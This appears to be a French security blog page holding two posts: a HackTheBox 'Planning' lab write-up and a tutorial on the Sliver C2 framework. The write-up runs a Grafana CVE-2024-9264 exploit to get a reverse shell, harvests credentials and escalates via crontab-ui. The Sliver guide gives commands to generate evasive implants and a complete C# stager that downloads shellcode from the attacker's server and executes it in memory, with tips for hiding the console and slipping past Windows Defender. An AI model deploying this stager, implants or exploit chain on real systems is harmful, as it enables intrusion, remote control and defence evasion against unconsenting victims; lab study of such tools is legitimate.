Blackshield

Étiquette : offsec

  • HackTheBox — Planning (Writeup)

    Dans ce writeup nous allons voir la différentes étapes d’un test d’intrusion d’un système, nous avons chois la box Planning du site de HackTheBix

    Reconaissance

    On lance un scan réseau vers l’adresse IP de la machine qui nous a été fourni à l’aide de nmap.

    L’option -A: Enable OS detection, version detection, script scanning, and traceroute est un peu agressive, mais il s’agit ici d’un environnement d’entrainement.

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Editor]
└─$ nmap -A 10.10.11.68
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 16:30 CEST
Nmap scan report for 10.10.11.68
Host is up (0.47s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   462.30 ms 10.10.16.1
2   674.98 ms 10.10.11.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.61 seconds

    On ajoute le nom de la machine dans notre fichier host pour pouvoir accéder au service web.

    Souvent le service est hébergé par un vhost et n’est donc pas disponible par défaut sur l’adresse http://10.10.11.68 mais via le nom de domaine planning.htb dans notre cas.

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Editor]
└─$ echo "10.10.11.68\tplanning.htb\n" | sudo tee  -a /etc/hosts

    On s’apercoit en accédent au service web hébérgé qu’il s’agit d’un site de Cours en ligne.

    Le site héberge des fichiers php et semble affiché uniquement les pages suivantes:

    • – index.php
    • – about.php
    • – courses.php
    • – contact.php
    • – enroll.php
    • – detail.php

    On va donc faire de l’énumération de répertoire et de fichier pour déterminer si des pages cachés sont accéssible

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines]
└─$ gobuster dir -u http://planning.htb -w /usr/share/wordlists/dirb/common.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://planning.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.php            (Status: 200) [Size: 12727]
/contact.php          (Status: 200) [Size: 10632]
/course.php           (Status: 200) [Size: 10229]
/css                  (Status: 301) [Size: 178] [--> http://planning.htb/css/]
/detail.php           (Status: 200) [Size: 13006]
/img                  (Status: 301) [Size: 178] [--> http://planning.htb/img/]
/index.php            (Status: 200) [Size: 23914]
/index.php            (Status: 200) [Size: 23914]
/js                   (Status: 301) [Size: 178] [--> http://planning.htb/js/]
/lib                  (Status: 301) [Size: 178] [--> http://planning.htb/lib/]
===============================================================
Finished
===============================================================

    Pour info vous pouvez facilement retrouver les worlistes sur kali avec la commande suivante :

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Planning]
└─$ wordlists

> wordlists ~ Contains the rockyou wordlist

/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt

    Après plusieurs listes de répertoire et de fichier testé, il ne semble pas y avoir de fichier caché.

    On va donc tester si il y’a des sous domaines accessibles.

    La wordlist dnsmap.txt sur la kali n’a rien donné donc j’ai téléchargé une worliste sur internet en suivant cet article https://sidxparab.gitbook.io/subdomain-enumeration-guide/active-enumeration/dns-bruteforcing

    ──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines]
└─$ gobuster vhost -t 100 -u planning.htb -w dnslist.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         100
[+] Wordlist:        dnslist.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================

    On trouve un vhost qui porte le nom de grafana et on va donc essayé de s’y connecter avec les identifians qui nous ont été donné.

    Même commande que précédement pour ajouter le vhost au fichier host de la machine.

    echo "10.10.11.68\tgrafana.planning.htb\n" | sudo tee  -a /etc/hosts

    Exploitation

    On trouve rapidement qu’il s’agit de la version **11.0.0** de Grafana.

    Une recherche rapide nous renvoie vers la CVE-2024-9264 qui est une vulnérabilité de type RCE (Remote code execution) dans la fonctionnalité des Expressions SQL de Grafana.

    Ce repo https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit GitHub contient un script python déjà tout fait pour exploiter la vulnérabilité.

    > Attention à toujours lire le code que l’on exécute d’internet.

    J’ouvre un listener en écoute sur le port 8888 via lequel je vais recevoir le reverse shell du serveur.

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Planning]
└─$ nc -lvp 8888
listening on [any] 8888 ...

    Dans un autre terminal j’execute le code d’exploitation de la vulnérabilité CVE-2024-9264

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Planning]
└─$ python poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.14.42 --reverse-port 8888
[SUCCESS] Login successful!
Reverse shell payload sent successfully!
Set up a netcat listener on 8888

    Normalement je vois apparaitre un terminal depuis mon listener

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Planning]
└─$ nc -lvp 8888
listening on [any] 8888 ...
connect to [10.10.14.42] from planning.htb [10.10.11.68] 35816
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#

    La présence de peu de fichier et aucune trace du site hébergé sur planning.htb laisse pensé qu’on est dans un environnement conteneurisé propre à Grafana.

    declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done

    On trouve des informations intéressante via la commande notamment un nom d’utilisateur et mot de passe.

    env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
OLDPWD=/usr/share/grafana/conf

    On peux donc essayé de se conntecter avec se couple identifiant/mot de passe sur le port 22 qui est ouvert sur la machine.

    ┌──(n4z4㉿vbox)-[~/Documents/HackTheBox/Machines/Planning]
└─$ ssh enzo@10.10.11.68
enzo@10.10.11.68's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-59-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu Aug  7 06:41:23 PM UTC 2025

  System load:  0.0               Processes:             231
  Usage of /:   65.4% of 6.30GB   Users logged in:       0
  Memory usage: 39%               IPv4 address for eth0: 10.10.11.68
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

102 updates can be applied immediately.
77 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Aug 7 18:41:24 2025 from 10.10.14.42
enzo@planning:~$

    On retrouve donc le premier flag dans le répertoire de l’utilisateur

    enzo@planning:~$ ll
total 32
drwxr-x--- 4 enzo enzo 4096 Apr  3 13:49 ./
drwxr-xr-x 3 root root 4096 Feb 28 16:22 ../
lrwxrwxrwx 1 root root    9 Feb 28 20:42 .bash_history -> /dev/null
-rw-r--r-- 1 enzo enzo  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 enzo enzo 3771 Mar 31  2024 .bashrc
drwx------ 2 enzo enzo 4096 Apr  3 13:49 .cache/
-rw-r--r-- 1 enzo enzo  807 Mar 31  2024 .profile
drwx------ 2 enzo enzo 4096 Feb 28 16:22 .ssh/
-rw-r----- 1 root enzo   33 Aug  7 18:02 user.txt
enzo@planning:~$ cat user.txt
flag ;)

    Elévation des privilèges

    La machine sur laquelle nous venons de nous connecter en ssh est la machine qui héberge le service web, en analysant son contenu dans /var/www/web/index.php on retrouve les informations suivantes :

    $servername = "localhost";
$username = "root";
$password = "EXTRapHY";
$dbname = "edukate";

    En cherchant sur la machine on trouve un fichier intéressant qui contient un mot de passe P4ssw0rdS0pRi0T3c :

    enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}

    Ce fichier un un job cron exécuter par l’utilisateur root

    enzo@planning:~$ ll /opt/crontabs/crontab.db
-rw-r--r-- 1 root root 737 Aug  8 13:30 /opt/crontabs/crontab.db

    Une analyse des service et port en écoute sur la machine nous montre des choses intéressantes, il y’a des services en écoute que sur l’adresse localhost.

    enzo@planning:~$ netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:3000          0.0.0.0:*               LISTEN
tcp        0      0 localhost:8000          0.0.0.0:*               LISTEN
tcp        0      0 _localdnsproxy:domain   0.0.0.0:*               LISTEN
tcp        0      0 _localdnsstub:domain    0.0.0.0:*               LISTEN
tcp        0      0 localhost:33060         0.0.0.0:*               LISTEN
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN
tcp        0      0 localhost:35997         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:http            0.0.0.0:*               LISTEN
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN
udp        0      0 _localdnsproxy:domain   0.0.0.0:*
udp        0      0 _localdnsstub:domain    0.0.0.0:*
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     9538     /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     15664    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     15668    /run/docker.sock
unix  2      [ ACC ]     STREAM     LISTENING     51052    /run/user/1000/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     51060    /run/user/1000/bus
unix  2      [ ACC ]     STREAM     LISTENING     15671    /run/lxd-installer.socket
unix  2      [ ACC ]     STREAM     LISTENING     15682    /run/uuidd/request
unix  2      [ ACC ]     STREAM     LISTENING     51297    /run/user/1000/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     51299    /run/user/1000/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     51301    /run/user/1000/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     51303    /run/user/1000/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     51305    /run/user/1000/gnupg/S.keyboxd
unix  2      [ ACC ]     STREAM     LISTENING     51307    /run/user/1000/pk-debconf-socket
unix  2      [ ACC ]     STREAM     LISTENING     51326    /run/user/1000/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     18169    /run/php/php8.3-fpm.sock
unix  2      [ ACC ]     STREAM     LISTENING     18700    /run/containerd/containerd.sock.ttrpc
unix  2      [ ACC ]     STREAM     LISTENING     18702    /run/containerd/containerd.sock
unix  2      [ ACC ]     STREAM     LISTENING     18776    /var/run/docker/metrics.sock
unix  2      [ ACC ]     STREAM     LISTENING     18780    /var/run/mysqld/mysqlx.sock
unix  2      [ ACC ]     STREAM     LISTENING     18794    /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     19046    /var/run/docker/libnetwork/41410b8f73d6.sock
unix  2      [ ACC ]     STREAM     LISTENING     16022    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     19604    /run/containerd/s/5dfa139daaabf7b365ccb85ae02fe006fae87a31062a64620ac2ee82cb2f4b12
unix  2      [ ACC ]     STREAM     LISTENING     11318    /run/systemd/io.systemd.sysext
unix  2      [ ACC ]     STREAM     LISTENING     10642    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     10644    /run/systemd/userdb/io.systemd.DynamicUser
unix  2      [ ACC ]     STREAM     LISTENING     10645    /run/systemd/io.systemd.ManagedOOM
unix  2      [ ACC ]     STREAM     LISTENING     10659    /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     10663    /run/systemd/fsck.progress
unix  2      [ ACC ]     STREAM     LISTENING     14125    /run/systemd/resolve/io.systemd.Resolve
unix  2      [ ACC ]     STREAM     LISTENING     10669    /run/systemd/journal/stdout
unix  2      [ ACC ]     STREAM     LISTENING     14126    /run/systemd/resolve/io.systemd.Resolve.Monitor
unix  2      [ ACC ]     SEQPACKET  LISTENING     10671    /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     15670    @ISCSIADM_ABSTRACT_NAMESPACE

    On teste d’accéder aux service depuis notre machine attaquante via un tunnel SSH

    ssh -L 8000:localhost:8000 enzo@10.10.11.68

    Une fois le tunnel effectué on se retrouve devant une mire d’authentification et le couple identifiant mot de passe suivant : **root/P4ssw0rdS0pRi0T3c** permet d’accéder à une interface d’administration

    Il s’agit de l’outil crontab-ui https://github.com/alseambusher/crontab-ui qui permet d’éditer des tâches cron depuis une interface graphique.

    La création de cette nouvelle cron nous permet de lire le flag contenu dans le répertoire root

    enzo@planning:/tmp$ cat flag.log
flag ;)

    Voila la fin du writeup, j’espère que celui-ci ta plu et que tu as appris des choses ?

    Je n’ai pour ma part pas encore réussi à faire pop un reverse shell en root, j’ai l’impression qu’il y’a des mécanisme de sécurité que je n’arrive pas à contourné, si tu as réussi, fait le moi savoir sur mes réseaux.

    Autres projets

    IronLab — Passionné d’électronique, robotique, d’aviation, de l’espace & projets DIY

    Site Web | YouTube | TikTok | Instagram

    Un peu de lecture complémentaire

    • https://medium.com/@stefanos.kalandaridis/bash-ing-your-network-f7069ab7c5f4
    • https://exploit-notes.hdks.org/exploit/container/docker/docker-escape/
    • https://delinea.com/blog/linux-privilege-escalation

  • Guide Sliver C2

    Description

    J’ai rédigé ce uide tutoriel sur l’utilisation de Sliver.

    Sliver est un puissant framework C2 open-source développé par Bishop Fox (bishopfox.com/). Tu peux le télécharger ici : github.com/BishopFox/sliver.

    Environnement de test

    Ce guide a été réalisé dans un environnement de test et à vocation uniquement à des fins éducatives.

    Le Lab se compose de 2 machines :

    • 1 Kalilinux qui va servir de Serveur C2 Sliver
    • 1 Machine sous Windows 10 qui sera notre victime.

    Configuration du C2

    Installation de sliver

    La première étape est d’installer sliver sur notre machine à l’aide des commandes :

    # Install sliver
curl https://sliver.sh/install|sudo bash 

    #Demarre le service
sudo systemctl start sliver.service

    # Lance la commande sliver
sliver

    Si tous se déroule correctement vous devriez avoir le shell Sliver qui s’affiche comme sur la capture suivante.

    Configuration du listener

    Maintenant il faut configurer le Listener sur lequel les agents infecté vont se connecter.

    sliver > https --lhost 192.168.1.93 --lport 443`
    • L’option –lhost permet de configurer l’adresse IP sur lequel va écouter le listener.
    • L’option –lport permet de configurer le port sur lequel va écouter le listener.

    Les protocoles supporté pour la communication vers le C2 sliver sont :

    • HTTP(S)
    • mTLS
    • TCP
    • DNS

    Génération de l’implant

    sliver > generate --http https://192.168.1.93:443 --format exe --arch amd64 --evasion --save impl.exe`

    Inféction du client

    Le client va télécharger l’implant sur son poste en se connectant sur serveur web sur la machine de l’attaquant :

    python -m http.server 8080

    Cette commande doit être exécutée dans le répertoire où se trouve le fichier impl.exe généré par sliver.

    Coté client il suffit juste de se connecter à l’adresse IP de l’attaquant http://192.168.1.93:8080/impl.exe

    Il se peut que votre antivirus détecte qu’il s’agisse d’un fichier malveillant et donc empêche l’exécution, vous pouvez désactiver celui-ci pour exécuter votre implant sliver sur la machine.

    Sliver commence à être très connu par les éditeurs et entreprises dans le domaine de la cybersécurité donc en l’état risque d’être directement détecté.

    à ce stade vous devriez avoir une notification dans votre shell qu’une session c’est etablie vers votre serveur sliver

    Commandes

    Pour lister les sessions actvies sur sliver vous pouvez utiliser la commande

    sessions

    Pour interagir avec un agent il faut récupérer son `id` et lancer la commande :

    use 67e3f139 #id de ma session active

    Un grand nombre de commandes est disponible que l’on peut retrouver avec la commande :

    help

    Ces commandes vont être exécutée sur la machine infectée et renvoyées au serveur C2 sliver comme par sur la capture suivante :

    Aller plus loin

    Les stagers

    Qu’est-ce qu’un stager ?

    Un stager est un petit composant initial d’une chaîne d’infection qui a pour rôle de préparer l’environnement et de télécharger / lancer le payload principal (second stage). C’est souvent le premier morceau de code qui s’exécute sur la machine compromise après la phase d’intrusion initiale.

    L’illustration décrit le principe de fonctionnement d’un fileless pour le stage 2 c’est à dire que celui-ci ne sera pas présent en tant que fichier mais chargé et exécuté directement en mémoire par le stage 1

    Cette technique à l’avantage de pouvoir contourner certains antivirus et EDR, car le stage 1 embarque très peu de code et est très léger.

    Sliver implémente les stagers en utilisant les `profiles`, ce sont des sortes d’implants.

    profiles new --https 192.168.1.93 --format shellcode sliver-shellcode

    Maintenant il faut créer le listener du stager, l’URL sur laquelle le poste infecté va récupere le stage 2.

    stage-listener --url http://192.168.1.93:1234 --profile sliver-shellcode

    Génération du Stage 1

    A ce stade notre C2 est prêt à recevoir les connexions des machines infectés, il faut maintenant créer notre stage 1 qui va se connecter au C2 sliver pour récupérer la shellcode générée précédement et hébergée sur l’URL : http://192.168.1.93:1234

    La documentation officiel du site de Sliver propose un code déjà fait en C#

    Il faut modifier l’URL pour qu’il pointe vers votre serveur sliver et celui-ci renvoie la shellcode, peu importe le nom devant le .woff dans l’URI.

    using System;

using System.Net;

using System.Runtime.InteropServices;

namespace SliverStager

{

    public class Stager

    {

        private static string url = "http://192.168.1.93:1234/implant.woff";

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]

        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]

        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        public static void DownloadAndExecute()

        {

            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

            System.Net.WebClient client = new System.Net.WebClient();

            byte[] shellcode = client.DownloadData(url);

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);

            Marshal.Copy(shellcode, 0, addr, shellcode.Length);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return;

        }

        public static void Main(String[] args)

        {

            DownloadAndExecute();

        }

    }

}

    Il faut bien sur avoir installer .NET sur une machine pour compiler le code du stage 1.

    Pour le télécharger vous pouver suivre ce lien :

    https://dotnet.microsoft.com/fr-fr/download

    Dans un terminal entrez la commande dotnet suivante pour créer un nouveau projet :

    dotnet new console

    Remplacer le code du fichier Program.cs généré par votre stage1 et entrer la commande suivante pour compiler :

    dotnet publish -r win-x64 -p:PublishSingleFile=true --self-contained false

    Pour que le fichier s’exécute sans l’apparition de la console coté utilisateur il faut remplacer dans le fichier csproj la ligne

    <OutputType>Exe</OutputType>

    par

    <OutputType>WinExe</OutputType>

    Normalement vous devriez avoir votre session qui apparait dans votre terminal sliver

    Vous pouvez également réactiver Windows Defender et logiquement il laissera s’exécuter votre stage 1 sans bloquer le ficher et sans création d’alerte.

    Aller plus loin

    J’espère que ce petit guide t’a plu et t’a aidé à comprendre comment mettre un serveur sliver en place rapidement et tester tes premiers implants.

    L’étape suivante consiste à utiliser des shellcode chiffrés pour encore moins de détection.

    Les 2 liens suivants sont une bonne base de lecture pour développer cette partie.

    • https://blog.balliskit.com/tutorial-sliver-c2-with-balliskit-macropack-and-shellcodepack-452e94c24b19
    • https://sliver.sh/docs?name=Stagers

    Autres projets

    IronLab — Passionné d’électronique, robotique, d’aviation, de l’espace & projets DIY

    Site Web | YouTube | TikTok | Instagram